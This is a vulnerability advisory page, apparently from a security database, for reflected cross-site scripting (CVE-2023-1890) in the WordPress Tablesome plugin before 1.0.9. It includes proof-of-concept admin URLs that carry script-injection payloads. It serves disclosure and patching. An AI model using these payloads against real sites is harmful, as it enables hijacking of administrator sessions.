Lucene search
K

WordPress Tablesome Cross Site Scripting

🗓️ 25 Jul 2023 00:00:00Reported by Taurus OmarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 306 Views

WordPress Tablesome Cross Site Scripting vulnerability in version < 1.0.

Related
Code
`Tittle:  
WordPress Plugin Tablesome < 1.0.9 - Reflected XSS  
  
References:  
CVE-2023-1890  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not escape various generated URLs, before outputting them in attributes when some notices are displayed, leading to Reflected Cross-Site Scripting  
  
Affects Plugins:  
Tablesome - Fixed in version 1.0.9  
  
Proof of Concept:  
Make a logged in admin open one of the URL below when the feature/tracking notice has not been dismissed yet  
  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&a%22%3E%27%3E%3Cdetails%2Fopen%2Fontoggle%3Dconfirm%28%27XSS%27%29%3E  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&tablesome_feature_notice_dismissed=1&</script><script>alert(/XSS/)</script>  
https://example.com/wp-admin/edit.php?post_type=tablesome_cpt&can_track_tablesome_events=1&</script><script>alert(/XSS/)</script>   
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/8ef64490-30cd-4e07-9b7c-64f551944f3d  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jul 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.16.1
EPSS0.01067
SSVC
306